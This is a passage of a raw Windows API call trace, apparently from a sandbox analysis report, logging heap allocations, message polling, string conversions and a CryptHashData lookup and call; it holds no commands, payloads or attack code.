(HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977938 [0266.973] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0266.973] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0266.973] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0266.973] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0266.973] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977bd8 | out: hHeap=0x970000) returned 1 [0266.973] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0266.973] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.973] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518e0 [0266.973] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0266.973] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0266.973] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b28 [0266.973] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9778d8 [0266.973] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0266.973] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0266.973] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0266.973] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0266.973] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0266.973] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0266.973] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0266.973] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0266.973] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0266.973] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0266.973] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54f78 [0266.973] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0266.973] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0266.974] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0266.974] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0266.974] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e550c8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0266.974] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0266.974] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0266.974] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0266.974] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0266.974] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0266.974] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0266.974] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e550c8 [0266.974] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0266.974] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0266.974] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9778d8 | out: hHeap=0x970000) returned 1 [0266.974] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0266.974] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0266.974] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0266.974] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0266.974] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0266.974] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0266.974] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518e0 | out: hHeap=0x970000) returned 1 [0266.974] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0266.974] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0266.974] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.974] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0266.974] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0266.974] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0266.974] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0266.974] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55b20 [0266.974] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0266.975] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0266.975] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55b20 | out: hHeap=0x970000) returned 1 [0266.975] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0266.975] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51af0 [0266.975] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0266.975] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0266.975] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0266.975] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0266.975] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0266.975] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0266.975] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0266.975] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0266.975] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0266.975] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0266.975] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0266.975] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0266.975] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0266.975] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0266.975] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0266.975] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0266.975] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0266.975] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518e0 [0266.975] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0266.975] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0266.975] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0266.975] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540f8 [0266.975] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0266.975] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0266.975] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0266.976] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0266.976] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0266.976] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0266.976] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0266.976] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0266.976] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ca0 [0266.976] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0266.976] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a88 [0266.976] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977db8 [0266.976] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51df0 [0266.976] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0266.976] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0266.976] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dc0 [0266.976] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0266.976] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0266.976] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0266.976] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2e51bc8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0266.976] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bc8 | out: hHeap=0x970000) returned 1 [0266.977] GetProcAddress (hModule=0x756e0000, lpProcName="CryptHashData") returned 0x756feef0 [0266.977] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e38 | out: hHeap=0x970000) returned 1 [0266.977] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0266.977] CryptHashData (hHash=0xa87610, pbData=0x2e54fd8, dwDataLen=0x3, dwFlags=0x1) returned 1 [0266.977] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.977] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.977] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0266.977] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.977] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0266.977] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55b20 | out: hHeap=0x970000) returned 1 [0266.977] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552b8 | out: hHeap=0x970000) returned 1 [0266.977] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51eb0 [0266.977] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0266.977] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0266.977] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e551c8 [0266.977] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e552b8 [0266.977] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552b8 | out: hHeap=0x970000) returned 1 [0266.977] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551c8 | out: hHeap=0x970000) returned 1 [0266.977] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0266.978] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51eb0 | out: hHeap=0x970000) returned 1 [0266.978] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55208 | out: hHeap=0x970000) returned 1 [0266.978] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e98 [0266.978] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55218 [0266.978] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c58 [0266.978] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55218 | out: hHeap=0x970000) returned 1 [0266.978] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e80 [0266.978] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e551a8 [0266.978] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c88 [0266.978] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551a8 | out: hHeap=0x970000) returned 1 [0266.978] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e08 [0266.978] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e551c8 [0266.978] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ce8 [0266.978] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551c8 | out: hHeap=0x970000) returned 1 [0266.978] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540a8 [0266.978] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c70 | out: hHeap=0x970000) returned 1 [0266.978] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d90 [0266.978] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e551f8 [0266.978] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540f8 [0266.978] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55208 [0266.978] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0266.978] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540f8 | out: hHeap=0x970000) returned 1 [0266.978] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55208 | out: hHeap=0x970000) returned 1 [0266.978] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51d00 [0266.978] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0266.978] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0266.978] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55228 [0266.978] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55298 [0266.978] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55298 | out: hHeap=0x970000) returned 1 [0266.978] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55228 | out: hHeap=0x970000) returned 1 [0266.979] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0266.979] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d00 | out: hHeap=0x970000) returned 1 [0266.979] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551f8 | out: hHeap=0x970000) returned 1 [0266.979] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dd8 [0266.979] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e551b8 [0266.979] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bf8 [0266.979] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551b8 | out: hHeap=0x970000) returned 1 [0266.979] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dc0 [0266.979] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e551e8 [0266.979] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551e8 | out: hHeap=0x970000) returned 1 [0266.979] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51df0 [0266.979] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55278 [0266.979] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ca0 [0266.979] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55278 | out: hHeap=0x970000) returned 1 [0266.979] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0266.979] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540a8 | out: hHeap=0x970000) returned 1 [0266.979] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51da8 [0266.979] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55148 [0266.979] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55148 | out: hHeap=0x970000) returned 1 [0266.979] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e50 [0266.979] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e552d8 [0266.979] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e20 [0266.979] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552d8 | out: hHeap=0x970000) returned 1 [0266.979] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51eb0 [0266.979] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55278 [0266.979] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55278 | out: hHeap=0x970000) returned 1 [0266.979] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c10 [0266.979] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55258 [0266.979] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c28 [0266.979] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55258 | out: hHeap=0x970000) returned 1 [0266.979] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c70 [0266.980] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55178 [0266.980] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55178 | out: hHeap=0x970000) returned 1 [0266.980] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55128 [0266.980] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d48 [0266.980] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0266.980] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cb8 [0266.980] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552a8 [0266.980] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55188 [0266.980] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cd0 [0266.980] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cb8 | out: hHeap=0x970000) returned 1 [0266.980] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552a8 | out: hHeap=0x970000) returned 1 [0266.980] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cd0 | out: hHeap=0x970000) returned 1 [0266.980] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55188 | out: hHeap=0x970000) returned 1 [0266.980] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d00 [0266.980] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55278 [0266.980] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cb8 [0266.980] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55258 [0266.980] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552d8 [0266.980] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cd0 [0266.980] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cb8 | out: hHeap=0x970000) returned 1 [0266.980] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55258 | out: hHeap=0x970000) returned 1 [0266.980] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cd0 | out: hHeap=0x970000) returned 1 [0266.980] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552d8 | out: hHeap=0x970000) returned 1 [0266.980] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55268 [0266.980] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d78 [0266.980] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55118 [0266.980] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551f8 [0266.980] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cb8 [0266.980] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d78 | out: hHeap=0x970000) returned 1 [0266.980] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55118 | out: hHeap=0x970000) returned 1 [0266.981] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cb8 | out: hHeap=0x970000) returned 1 [0266.981] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551f8 | out: hHeap=0x970000) returned 1 [0266.981] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55298 [0266.981] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d78 [0266.981] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55228 [0266.981] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55138 [0266.981] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cb8 [0266.981] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d78 | out: hHeap=0x970000) returned 1 [0266.981] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55228 | out: hHeap=0x970000) returned 1 [0266.981] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cb8 | out: hHeap=0x970000) returned 1 [0266.981] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55138 | out: hHeap=0x970000) returned 1 [0266.981] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55188 [0266.981] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d78 [0266.981] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55118 [0266.981] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55248 [0266.981] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cb8 [0266.981] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d78 | out: hHeap=0x970000) returned 1 [0266.981] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55118 | out: hHeap=0x970000) returned 1 [0266.981] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cb8 | out: hHeap=0x970000) returned 1 [0266.981] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55248 | out: hHeap=0x970000) returned 1 [0266.981] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0266.981] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d00 | out: hHeap=0x970000) returned 1 [0266.981] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552a8 [0266.981] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cb8 [0266.981] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552b8 [0266.981] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552d8 [0266.982] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cd0 [0266.982] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cb8 | out: hHeap=0x970000) returned 1 [0266.982] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552b8 | out: hHeap=0x970000) returned 1 [0266.982] HeapFree (in: hHeap=0x970000, 